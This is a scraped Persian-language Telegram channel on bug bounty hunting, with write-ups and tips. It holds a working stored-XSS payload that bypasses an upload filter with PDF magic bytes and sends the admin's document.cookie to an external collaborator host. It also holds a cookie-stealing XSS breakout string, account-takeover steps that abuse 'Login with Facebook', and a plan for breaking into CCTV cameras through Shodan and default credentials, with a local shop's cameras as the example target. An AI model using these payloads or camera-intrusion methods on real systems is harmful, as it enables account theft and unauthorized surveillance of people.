Life and Learning🎭 – Telegram
Life and Learning🎭
372 subscribers
55 photos
29 videos
11 files
61 links
Hello, welcome to my channel, I hope the posts of this channel add something to you

ADMIN:https://news.1rj.ru/str/AlI_VD2005
Twitter: https://x.com/CountMoteVaziri
Download Telegram
خیلی عالی داره پیش میره 11 روش و شیوه دسترسی به دوربین های مداربسته رو ثبت کردم که یکی یکی انجام میدیم و توضیحاتش رو شرح میدیم یه ابزاری هم خودم نوشته بودم خیلی سال پیش (مربوط به رزومه خیلی سال پیش من میشه ) رو هم توضیح میدم توی ویدیو برقا بیاد بریم برای رکورد!

#دوربین_مداربسته
#امنیت
9
Life and Learning🎭
آقا رایت آپ بخونین خیلی کمکتون میکنه!! #تجربه
درمورد این پیام، ببینین رفرنس زیاده اگر برید دنبالش و بخواید پیشرفت کنید!

من یه سری رفرنس معرفی میکنم ولی همش به تلاش خودتون بستگی داره :

1. medium.com
2. memoryleaks.ir
3. Youtube.com
4. aparat.com
5. Blog.voorivex.team
6. Marzban.net
7. "Report" site:hackerone.com
8. Public Telegram channel
اینا یه سری از رفرنس ها هستن که میتونید ازشون استفاده کنید برای بهبود عملکرد و علم خودتون.

#رایتآپ #باگ_بانتی | nvsecurity
پستی از آقای مجاور!
🔐 تکنیکی خطرناک برای تصاحب حساب کاربران با استفاده از "ورود با فیسبوک"

اگه هدفی تست می‌کنی که "Login with Facebook" داره، این سناریوها رو بررسی کن:
ایمیل رو موقع ورود با فیسبوک share نکن و ببین سایت چطور رفتار می‌کنه.

چطور ایمیل رو hide کنی؟
۱. ورود با فیسبوک
۲. "Edit Access"
۳. تیک ایمیل رو بردار
۴. ادامه بده

📌 سناریو ۱: تصاحب از طریق لینک‌کردن حساب
۱. ورود با فیسبوک (ایمیل غیرقابل اشتراک)
۲. سایت گفت ایمیل بده برای لینک کردن → victim@example.com
۳. مجدد همون FB با attacker@example.com → سایت همون لینک رو برای هردو فرستاد
۴. لینک رو برای victim@example استفاده کردم و حساب رو تصاحب کردم

📌 سناریو ۲: تصاحب مستقیم
۱. ورود با فیسبوک بدون ایمیل
۲. سایت گفت ایمیل بده → victim@example.com
۳. بدون تاییدیه، مستقیماً وارد حساب قربانی شدم

📌 سناریو ۳: Pre-account Takeover
سایت‌هایی که فقط دامنه ایمیل رو برای دسترسی‌های خاص چک می‌کنن رو میشه با همین روش دور زد و دسترسی گرفت.


#باگ_بانتی #سناریو
🆒2
🔎دوربین مداربسته!
یکی از سخت افزار ها برای بینایی از راه دور که ازش استفاده میشه!

🤔چطور میشه بهش نفوذ کرد؟
قراره همینو بهتون بگیم!

به چند روش؟🤥
از نظر من به 2 روش (اتک لوکال، اتک اکسترنال) ولی به صورت تکنیکی 11 تا تکنیک جدا کردم.

تکنیک ها رو میتونی بگی؟ 👾
+ از طریق متور جستجو گر گوگل
+ از طریق متور جستجو گر شودان
+ از طریق ابزار ها (یکی که خودم نوشتم رو توی کانال قرار میدم)
+ از طریق اسکن ایپی خاص
+ از طریق اکسپلویت ها
+ از طریق وب‌سایت ها
+ از طریق شبکه داخل (دسترسی اولیه میخاد به شبکه)
+ حمله به یه شرکت خاص ( از طریق دیفالت کریدینشیال)

یه کانال هم براتون قرار بود بیارم چک کردم دیدم دو سه تا از آموزش هاش رایگان هست بقیش رو پولی کرده برا همین از رایگان هاش استفاده کنید.🔥


نکته:
به طور کلی نفوذ و دسترسی به دوربین مداربسته علم خاصی نمیخاد، یعنی تو از طریق اوسینت هم میتونی دسترسی بگیری به دوربین ها ولی اگر بخای به یه دوربین خاص دسترسی بگیری چی؟ مثلا دوربین مغازه اصغر بقال سر کوچه رو تصور کنید.
اصغر دوربین هاشو متصل کرده روی شبکه داخل : شما پس باید بهش متصل بشید مثلا اول به مودمش وصل بشید بعد از طریق اسکن ایپی و دیوایس های متصل به مودم بتونی پیدا کنی ( پسورد هم داشته باشه باید بتونی ازش رد شی)
سناریو دوم اینه که روی شبکه خارجی باشه ( من دیدم بعضی از نصاب های دوربین مداربسته با لیبل ایپی هارو میزنن که راحت تر شبکه کنن دوربین هارو) میتونید اییپ رو دربیاورید و بهش وصل بشید مثلا ببینین ایپی که مودم میده توی سطح ایرنتنت چیه بعد اسکنش کنی تا ببینی کدوم اییپ مربوط به دو بنی اصغر آقاس!


ببینین کاملا شبکس! یعنی علوم خاصی که بگم باید یه دوره شخصی و تخصصی ببینی نداره نه نیاز نیست واقعا! بهتون طی زمان کامل میگم که چطوره اوضاع.


📌 کانال + پارتی از آموزش : https://news.1rj.ru/str/BlackWacker/4584
1
یه جایی معنی ایران رو نوشته بود واقعا معنی قشنگ و با وقاری بود برای این سرزمین.
نوشته بود که
ایران یعنی "سرزمین شریف زادگان شجاع"
توی تموم این سال ها این کلمه ثابت شده و تک تک سختی ها و لحضات توی ایران نشانه درست بودن این کلمس!


احسنت بر تحلیل گر این کلمه.
👍6
دوستان همیشه شخصیت کاریتون براتون مهم باشه ، هیچ وقت پرخاشگری یا بی ادبانه صحبت نکنید.
چون اولن که توی ایرانیم میتونن خیلی راحت ازتون شکایت کنن و دومن هم برای آینده خودتون بده از یه جایی به بعد سایتا براتون تکراریه ، تریاژر ها تکراریه ، مدیریت ها تکراریه برا همین شما اگر رزومه خوبی نداشته باشید قطعا بد عذیت میشید پس به اعصاب خودتون مسلط باشید و سعی کنید همیشه موادبانه و حرفه ای برخورد کنید حتی اگر اخر بانتی بهتون تعلق نگیره

#تجربه #باگ_بانتی
4
تا حالا شنده بودین که یکی ادمین و منیجر رو تیک اور کنه؟
اره تایتلش اینه : Stored XSS Via Bypass File Upload Lead to Full Account Take Over Superlevel Users
چطور حالا بهش میرسیم؟ من خودم چندین بار این آسیب پذیری رو زدم و تقریبا 80 درصدش توی تیکت ها بوده

حالا چی هست اصلا؟ تیکه تیکه توی پست ها توضیح میدم !

#باگ_بانتی | #رایتاپ
شما فکر کنید فلوی عادی سایت اینه که فایل HTML میخای اپلود کنی نمیزاره ولی PDF میزاره 🙂‍↔️
شاید بگین چرا با همون PDF باگ XSSنمیزنی باید بگم که چرا باید بین طلا و نقره برم و نقره رو قبول کنم؟ طلا بهتره ، پولش و درجه حساسیتش بالا تره

حالا این درخواستیه که توی اپلود تیکت بود و وقتی فایل HTML میذاشتیم اجاره اپلود نمیداد (با اینکه کد های HTML که زدم علنن یه قالب وبسایته کار نگیرین😂) بعد به ذهنم رسید که چطور اینو بایپس کنیم ؟

اینی که به فرمت HTML گیر میده ولی به کانتنت تایپ text/html نه ، و بادی درخواست هم چک میکنه که چی باشه !

چطور دورش بزنیم؟ آفرین با فرمت های دیگه ولی وقتی رفتم و فرمت shtml رو اپ کردم نشد و یهو به ذهنم خورد که یه متد بایپس وجود داره با مجیک بایت!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

و رفتم برا تست

#باگ_بانتی | #رایتاپ
3
نشستم باهاش ور رفتم و داشتم پارامتر هارو تغییر میدادم که دیدم اینطوری بایپس شد

اسم فایل : test.shtml
کانتنت تایپ : text/html
بادی درخواست
%PDF-1.3
<!DOCTYPE html>
<html lang="en">
<body>
<h1>Hello Admin Are You a humand?</h1>
<noscript>
function admin () {
var xhr = new XMLHttpRequest(); xhr.open("POST", "https://zmpcnszibh3k05hk0h185fxft6zxnnbc.oastify.com", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send(document.cookie);
}
</noscript>
<input type="checkbox" value="yes" onclick="admin()">
</body>
</html>
%%EOF


و بومممممممم یه اکانت تیک اور ادمین خوشگل

#باگ_بانتی | #رایتاپ
6
Life and Learning🎭
نشستم باهاش ور رفتم و داشتم پارامتر هارو تغییر میدادم که دیدم اینطوری بایپس شد اسم فایل : test.shtml کانتنت تایپ : text/html بادی درخواست %PDF-1.3 <!DOCTYPE html> <html lang="en"> <body> <h1>Hello Admin Are You a humand?</h1> <noscript> function admin () {…
شاید بپرسین چطور بایپس شده؟ ببینید فیچر فایل اپلود گفتم بادی درخواست رو چک میکنه و فایلPDF رو اجازه اپلود میده پس رفتم و درخواست اپلود PDF رو بررسی کردم و Magic Bytes فرمت Pdf رو گرفتم و گذشتم توی فایل HTMl و دیدم فیچر دور خورد (فیچر فکر میکرد که فایل اپلودی Pdf هستش بخاطر مجیک بایت) ولی در اصل فایل مخرب بود و اینطوری بود که یه باگ Critical ثبت شد
سناریو بالا که خدمتتون شرح دادم رو واقعیت روی سایتای ایرانی بیشتر دیدم ! و خیلی هم مرسومه (روی سایتایی زدم که توی حوزه خودشون حرفی برای گفتن دارن) پس تست کنید همیشه اگر بخوره واقعا باگ خفنی زدید!
در آخرم وقتی اومد و ادمین دید این درخواست برای سرور من اومد! و اینجا اشک شوق داشتم میریختم (علکی)!
خب دوستان اومدم با یه تجربه برگ ریزون دیگه از کار روی سایت ایرانی!

یه شرکتی روشون کار کردیم (بماندکه ادعا میکردن که ما خیلی امنیم) حدودا 5 تا باگ زدیم که از این 5 تا 3 تاش حیاتی بود 1 با سطح بسیار مهم و یکی هم مدیوم یا متوسط

آقا اینا سر مارو شیره مالیدن و کلا گفتن 20 تمن میدیم ( یه پیمنت پراسس زدم ازشون که قیمت خود اون 45 میلیون بود طبق تجربه بانتی های اخیر) بعد هیچی گفتیم باشه
گذشت و گذشت جنگ شد و اینا
بعد از جنگ گفتن آقا جنگه بزار دو تا قسط کنیم 20 میلیون رو دوتا 10 تمن بدیم
گفتیم باشه
بعد الان اومدن میگن به فکر اینیم که شرکت رو منحل کنیم و تعطیلش کنیم فعلا بیا 5 تمن بدیم بهتون تا ببینیم چطور میشه اوضاع 😐
روز به روز کار کردن روی وبسایت های ایرانی و توی ایران داره جالب تر و عجیب تر میشه
یعنی تو به یه هانتر خارجی بگی که من 5 تا باگ زدم از یه شرکت و بعد موقع بانتی دادن منحل شده شرکت به خدا اگر باورش شه 😑😑

آره دوستان باگ بزنید!

#تجربه
10
Life and Learning🎭
تا حالا شنده بودین که یکی ادمین و منیجر رو تیک اور کنه؟ اره تایتلش اینه : Stored XSS Via Bypass File Upload Lead to Full Account Take Over Superlevel Users چطور حالا بهش میرسیم؟ من خودم چندین بار این آسیب پذیری رو زدم و تقریبا 80 درصدش توی تیکت ها بوده …
بعضی وقتا سایت یه سری اپشن داره که خیلی خاصن مثل قسمت تیکت ها ، چت با هم تیمی ، چت با سایر کاربران ، چت با ربات ، چت با هوش مصنوعی و .... که اگر آسیب پذیری در قسمت تیکت ها بزنی معمولا سطح خوبی میگیرن چون با ادمین ها هستش اکسپلویت شدنش ، یعنی مخرب بودنش بیشتر از تاثیر روی یه کاربر عادیه حالا یعنی چی؟ما توی تیکت ها میایم و یه سوال یا یه درخواستی رو مطرح میکنیم و میفرستیم برای ادمین مروبطه یا تحت شرایطی برای مدیریت و آنها این پیغام رو میبینند و در نهایت روی اون ریپلای میزنند و پاسخ درخور شمارو میدن!
حالا آسیب پذیریش کجاس؟ بیاین بهتون بگم
👍6
در تیکت ها ما وقتی یه سوالی میپرسیم ، به یه حالت چت گونه ای پیغام ما توی صفحه HTML دیده میشه و در آنجا ذخیره میشه ! و همینطور هم از سمت ادمین هم همین اتفاق میوفته و پیغام ما برای ادمین نمایش داده میشه !

حالا اگر ما توی پیغاممون یه پیلود خطرناک که منجر به دزدیدن اکانت ادمین بشه بزاریم و بفرستیم چی میشه ؟ هیچ اکانت ادمین دستت میوفته و میتونی واردش بشی و سعی کنی سطح دسترسیت رو از طریق اپلود شل و .... بالا تر ببری

در اینجا منم همین کارو کردم اومدم بین پیغامم پیلود مخرب زدم که وقتی ادمین این پیام منو سین کرد سمتش یه اتفاقاتی بیوفته (که در این پیلود عمل خاصی اتفاق نمیوفته)
و و و حتی این پیلود من از سمت ادمین قابل رویت نیست ولی کار میکنه سمتش چرا؟ چون تگ اسکریپت مثل سایر تگ ها نیست که خروجیش دیده بشه و یا کدش دیده بشه برای همین دور از دید کاربر یا ادمین یا تارگت اعمال میشه!

و اینطوری ادمین رو تیک اور میکنن!!!!!!!!!!!!!

#باگ_بانتی | #رایتاپ
👏3👎1🤡1
خروجی کار هم به این صورت هستش که میتونید ببینید که پیغام به صورت عادی رفلکت شده

و در نهایت باید بگم که این آسیب پذیری در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!

#باگ_بانتی | #رایتاپ
👍6
در بعضی از سایت ها باید بشینین و تحلیل کنید که چطور با XSS میتونید برسید همیشه با پیلود های ساده نمیتونید دست پیدا کنید مثل این پیلود که خیلی عجیب و البته هوشمندانه بود !
https://example.com/?q=testsec'})});alert(document.cookie);$(function () { app.product.filter.init({ noscript: '


#باگ_بانتی | #رایتاپ
🔥41